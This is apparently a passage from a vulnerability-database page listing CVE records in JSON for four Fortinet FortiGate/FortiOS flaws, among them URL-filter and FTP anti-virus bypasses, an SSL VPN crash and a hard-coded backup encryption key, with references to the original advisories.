"url": "http://www.vupen.com/english/advisories/2006/0539"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2005-3058",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Interpretation conflict in Fortinet FortiGate 2.8, running FortiOS 2.8MR10 and v3beta, allows remote attackers to bypass the URL blocker via an (1) HTTP request terminated with a line feed (LF) and not carriage return line feed (CRLF) or (2) HTTP request with no Host field, which is still processed by most web servers without violating RFC2616."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20060213 URL filter bypass in Fortinet",
"refsource": "FULLDISC",
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042140.html"
},
{
"name": "20060213 URL filter bypass in Fortinet",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/424858/100/0/threaded"
},
{
"name": "fortinet-web-filter-bypass(24626)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/24626"
},
{
"name": "16599",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/16599"
},
{
"name": "18844",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/18844"
},
{
"name": "http://www.fortiguard.com/advisory/FGA-2006-10.html",
"refsource": "MISC",
"url": "http://www.fortiguard.com/advisory/FGA-2006-10.html"
},
{
"name": "ADV-2006-0539",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2006/0539"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2005-3058",
"datePublished": "2006-02-14T19:00:00",
"dateReserved": "2005-09-26T00:00:00",
"dateUpdated": "2024-08-07T22:53:30.384Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2005-3057 (GCVE-0-2005-3057)
Vulnerability from nvd – Published: 2006-02-14 19:00 – Updated: 2024-08-07 22:53
VLAI?
Summary
The FTP component in FortiGate 2.8 running FortiOS 2.8MR10 and v3beta, and other versions before 3.0 MR1, allows remote attackers to bypass the Fortinet FTP anti-virus engine by sending a STOR command and uploading a file before the FTP server response has been sent, as demonstrated using LFTP.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T22:53:30.477Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20060213 Bypass Fortinet anti-virus using FTP",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042139.html"
},
{
"name": "16597",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/16597"
},
{
"name": "20060213 Bypass Fortinet anti-virus using FTP",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://marc.info/?l=bugtraq\u0026m=113986337408103\u0026w=2"
},
{
"name": "18844",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/18844"
},
{
"name": "ADV-2006-0539",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2006/0539"
},
{
"name": "fortinet-ftp-scan-bypass(24624)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/24624"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2006-02-13T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The FTP component in FortiGate 2.8 running FortiOS 2.8MR10 and v3beta, and other versions before 3.0 MR1, allows remote attackers to bypass the Fortinet FTP anti-virus engine by sending a STOR command and uploading a file before the FTP server response has been sent, as demonstrated using LFTP."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-07-10T14:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20060213 Bypass Fortinet anti-virus using FTP",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042139.html"
},
{
"name": "16597",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/16597"
},
{
"name": "20060213 Bypass Fortinet anti-virus using FTP",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://marc.info/?l=bugtraq\u0026m=113986337408103\u0026w=2"
},
{
"name": "18844",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/18844"
},
{
"name": "ADV-2006-0539",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2006/0539"
},
{
"name": "fortinet-ftp-scan-bypass(24624)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/24624"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2005-3057",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The FTP component in FortiGate 2.8 running FortiOS 2.8MR10 and v3beta, and other versions before 3.0 MR1, allows remote attackers to bypass the Fortinet FTP anti-virus engine by sending a STOR command and uploading a file before the FTP server response has been sent, as demonstrated using LFTP."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20060213 Bypass Fortinet anti-virus using FTP",
"refsource": "FULLDISC",
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042139.html"
},
{
"name": "16597",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/16597"
},
{
"name": "20060213 Bypass Fortinet anti-virus using FTP",
"refsource": "BUGTRAQ",
"url": "http://marc.info/?l=bugtraq\u0026m=113986337408103\u0026w=2"
},
{
"name": "18844",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/18844"
},
{
"name": "ADV-2006-0539",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2006/0539"
},
{
"name": "fortinet-ftp-scan-bypass(24624)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/24624"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2005-3057",
"datePublished": "2006-02-14T19:00:00",
"dateReserved": "2005-09-26T00:00:00",
"dateUpdated": "2024-08-07T22:53:30.477Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2019-15705 (GCVE-0-2019-15705)
Vulnerability from cvelistv5 – Published: 2019-11-27 20:38 – Updated: 2024-10-25 14:27
VLAI?
Summary
An Improper Input Validation vulnerability in the SSL VPN portal of FortiOS versions 6.2.1 and below, and 6.0.6 and below may allow an unauthenticated remote attacker to crash the SSL VPN service by sending a crafted POST request.
Severity ?
No CVSS data available.
CWE
- Denial of Service
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T00:56:22.357Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://fortiguard.com/advisory/FG-IR-19-236"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2019-15705",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-24T20:09:51.320087Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-10-25T14:27:42.720Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "FortiGate",
"vendor": "Fortinet",
"versions": [
{
"status": "affected",
"version": "FortiOS versions 6.2.1 and below"
},
{
"status": "affected",
"version": "FortiOS versions 6.0.6 and below"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An Improper Input Validation vulnerability in the SSL VPN portal of FortiOS versions 6.2.1 and below, and 6.0.6 and below may allow an unauthenticated remote attacker to crash the SSL VPN service by sending a crafted POST request."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Denial of Service",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-11-27T20:38:54",
"orgId": "6abe59d8-c742-4dff-8ce8-9b0ca1073da8",
"shortName": "fortinet"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://fortiguard.com/advisory/FG-IR-19-236"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "psirt@fortinet.com",
"ID": "CVE-2019-15705",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "FortiGate",
"version": {
"version_data": [
{
"version_value": "FortiOS versions 6.2.1 and below"
},
{
"version_value": "FortiOS versions 6.0.6 and below"
}
]
}
}
]
},
"vendor_name": "Fortinet"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "An Improper Input Validation vulnerability in the SSL VPN portal of FortiOS versions 6.2.1 and below, and 6.0.6 and below may allow an unauthenticated remote attacker to crash the SSL VPN service by sending a crafted POST request."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Denial of Service"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://fortiguard.com/advisory/FG-IR-19-236",
"refsource": "CONFIRM",
"url": "https://fortiguard.com/advisory/FG-IR-19-236"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "6abe59d8-c742-4dff-8ce8-9b0ca1073da8",
"assignerShortName": "fortinet",
"cveId": "CVE-2019-15705",
"datePublished": "2019-11-27T20:38:54",
"dateReserved": "2019-08-27T00:00:00",
"dateUpdated": "2024-10-25T14:27:42.720Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2019-6693 (GCVE-0-2019-6693)
Vulnerability from cvelistv5 – Published: 2019-11-21 15:08 – Updated: 2025-10-21 23:35
VLAI?
Summary
Use of a hard-coded cryptographic key to cipher sensitive data in FortiOS configuration backup file may allow an attacker with access to the backup file to decipher the sensitive data, via knowledge of the hard-coded key. The aforementioned sensitive data includes users' passwords (except the administrator's password), private keys' passphrases and High Availability password (when set).
Severity ?
6.5 (Medium)
CWE
- Information disclosure
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T20:31:03.455Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://fortiguard.com/advisory/FG-IR-19-007"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2019-6693",
"options": [
{
"Exploitation": "active"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-06-24T03:55:38.395266Z",
"version": "2.0.3"
},
"type": "ssvc"
}
},
{
"other": {
"content": {
"dateAdded": "2025-06-25",
"reference": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2019-6693"
},
"type": "kev"
}
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-798",
"description": "CWE-798 Use of Hard-coded Credentials",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-10-21T23:35:57.795Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"government-resource"
],
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2019-6693"
}
],
"timeline": [
{
"lang": "en",
"time": "2025-06-25T00:00:00+00:00",
"value": "CVE-2019-6693 added to CISA KEV"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "FortiGate",
"vendor": "Fortinet",
"versions": [
{
"status": "affected",
"version": "5.6.9 and below"
},
{
"status": "affected",
"version": "6.0.5 and below"
},
{
"status": "affected",
"version": "6.2.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Use of a hard-coded cryptographic key to cipher sensitive data in FortiOS configuration backup file may allow an attacker with access to the backup file to decipher the sensitive data, via knowledge of the hard-coded key. The aforementioned sensitive data includes users\u0027 passwords (except the administrator\u0027s password), private keys\u0027 passphrases and High Availability password (when set)."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Information disclosure",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-11-21T15:08:05.000Z",
"orgId": "6abe59d8-c742-4dff-8ce8-9b0ca1073da8",
"shortName": "fortinet"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://fortiguard.com/advisory/FG-IR-19-007"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "psirt@fortinet.com",
"ID": "CVE-2019-6693",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "FortiGate",
"version": {
"version_data": [
{
"version_value": "5.6.9 and below"
},
{
"version_value": "6.0.5 and below"
},
{
"version_value": "6.2.0"
}
]
}
}
]
},
"vendor_name": "Fortinet"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Use of a hard-coded cryptographic key to cipher sensitive data in FortiOS configuration backup file may allow an attacker with access to the backup file to decipher the sensitive data, via knowledge of the hard-coded key. The aforementioned sensitive data includes users\u0027 passwords (except the administrator\u0027s password), private keys\u0027 passphrases and High Availability password (when set)."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Information disclosure"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://fortiguard.com/advisory/FG-IR-19-007",
"refsource": "CONFIRM",
"url": "https://fortiguard.com/advisory/FG-IR-19-007"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "6abe59d8-c742-4dff-8ce8-9b0ca1073da8",
"assignerShortName": "fortinet",
"cveId": "CVE-2019-6693",
"datePublished": "2019-11-21T15:08:05.000Z",
"dateReserved": "2019-01-23T00:00:00.000Z",
"dateUpdated": "2025-10-21T23:35:57.795Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2005-3058 (GCVE-0-2005-3058)
Vulnerability from cvelistv5 – Published: 2006-02-14 19:00 – Updated: 2024-08-07 22:53
VLAI?
Summary
Interpretation conflict in Fortinet FortiGate 2.8, running FortiOS 2.8MR10 and v3beta, allows remote attackers to bypass the URL blocker via an (1) HTTP request terminated with a line feed (LF) and not carriage return line feed (CRLF) or (2) HTTP request with no Host field, which is still processed by most web servers without violating RFC2616.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T22:53:30.384Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20060213 URL filter bypass in Fortinet",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042140.html"
},
{
"name": "20060213 URL filter bypass in Fortinet",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/424858/100/0/threaded"
},
{
"name": "fortinet-web-filter-bypass(24626)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/24626"
},
{
"name": "16599",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/16599"
},
{
"name": "18844",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/18844"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.fortiguard.com/advisory/FGA-2006-10.html"
},
{
"name": "ADV-2006-0539",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2006/0539"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2006-02-13T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Interpretation conflict in Fortinet FortiGate 2.8, running FortiOS 2.8MR10 and v3beta, allows remote attackers to bypass the URL blocker via an (1) HTTP request terminated with a line feed (LF) and not carriage return line feed (CRLF) or (2) HTTP request with no Host field, which is still processed by most web servers without violating RFC2616."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-19T14:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20060213 URL filter bypass in Fortinet",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042140.html"
},
{
"name": "20060213 URL filter bypass in Fortinet",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/424858/100/0/threaded"
},
{
"name": "fortinet-web-filter-bypass(24626)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/24626"
},
{
"name": "16599",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/16599"
},
{
"name": "18844",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/18844"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.fortiguard.com/advisory/FGA-2006-10.html"
},
{
"name": "ADV-2006-0539",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2006/0539"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2005-3058",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Interpretation conflict in Fortinet FortiGate 2.8, running FortiOS 2.8MR10 and v3beta, allows remote attackers to bypass the URL blocker via an (1) HTTP request terminated with a line feed (LF) and not carriage return line feed (CRLF) or (2) HTTP request with no Host field, which is still processed by most web servers without violating RFC2616."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20060213 URL filter bypass in Fortinet",
"refsource": "FULLDISC",
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042140.html"
},
{
"name": "20060213 URL filter bypass in Fortinet",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/424858/100/0/threaded"
},
{
"name": "fortinet-web-filter-bypass(24626)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/24626"
},
{
"name": "16599",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/16599"
},
{
"name": "18844",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/18844"
},
{
"name": "http://www.fortiguard.com/advisory/FGA-2006-10.html",
"refsource": "MISC",
"url": "http://www.fortiguard.com/advisory/FGA-2006-10.html"
},
{
"name": "ADV-2006-0539",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2006/0539"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2005-3058",
"datePublished": "2006-02-14T19:00:00",
"dateReserved": "2005-09-26T00:00:00",
"dateUpdated": "2024-08-07T22:53:30.384Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2005-3057 (GCVE-0-2005-3057)
Vulnerability from cvelistv5 – Published: 2006-02-14 19:00 – Updated: 2024-08-07 22:53
VLAI?
Summary
The FTP component in FortiGate 2.8 running FortiOS 2.8MR10 and v3beta, and other versions before 3.0 MR1, allows remote attackers to bypass the Fortinet FTP anti-virus engine by sending a STOR command and uploading a file before the FTP server response has been sent, as demonstrated using LFTP.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T22:53:30.477Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20060213 Bypass Fortinet anti-virus using FTP",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042139.html"
},
{
"name": "16597",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/16597"
},
{
"name": "20060213 Bypass Fortinet anti-virus using FTP",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://marc.info/?l=bugtraq\u0026m=113986337408103\u0026w=2"
},
{
"name": "18844",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/18844"
},
{
"name": "ADV-2006-0539",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2006/0539"
},
{
"name": "fortinet-ftp-scan-bypass(24624)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/24624"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2006-02-13T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The FTP component in FortiGate 2.8 running FortiOS 2.8MR10 and v3beta, and other versions before 3.0 MR1, allows remote attackers to bypass the Fortinet FTP anti-virus engine by sending a STOR command and uploading a file before the FTP server response has been sent, as demonstrated using LFTP."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-07-10T14:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20060213 Bypass Fortinet anti-virus using FTP",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042139.html"
},
{
"name": "16597",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/16597"
},
{
"name": "20060213 Bypass Fortinet anti-virus using FTP",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://marc.info/?l=bugtraq\u0026m=113986337408103\u0026w=2"
},
{
"name": "18844",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/18844"
},
{
"name": "ADV-2006-0539",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2006/0539"
},
{
"name": "fortinet-ftp-scan-bypass(24624)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/24624"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2005-3057",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The FTP component in FortiGate 2.8 running FortiOS 2.8MR10 and v3beta, and other versions before 3.0 MR1, allows remote attackers to bypass the Fortinet FTP anti-virus engine by sending a STOR command and uploading a file before the FTP server response has been sent, as demonstrated using LFTP."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20060213 Bypass Fortinet anti-virus using FTP",
"refsource": "FULLDISC",
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042139.html"
},
{
"name": "16597",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/16597"
},
{
"name": "20060213 Bypass Fortinet anti-virus using FTP",
"refsource": "BUGTRAQ",
"url": "http://marc.info/?l=bugtraq\u0026m=113986337408103\u0026w=2"
},
{
"name": "18844",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/18844"
},
{
"name": "ADV-2006-0539",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2006/0539"
},
{
"name": "fortinet-ftp-scan-bypass(24624)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/24624"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2005-3057",
"datePublished": "2006-02-14T19:00:00",
"dateReserved": "2005-09-26T00:00:00",
"dateUpdated": "2024-08-07T22:53:30.477Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}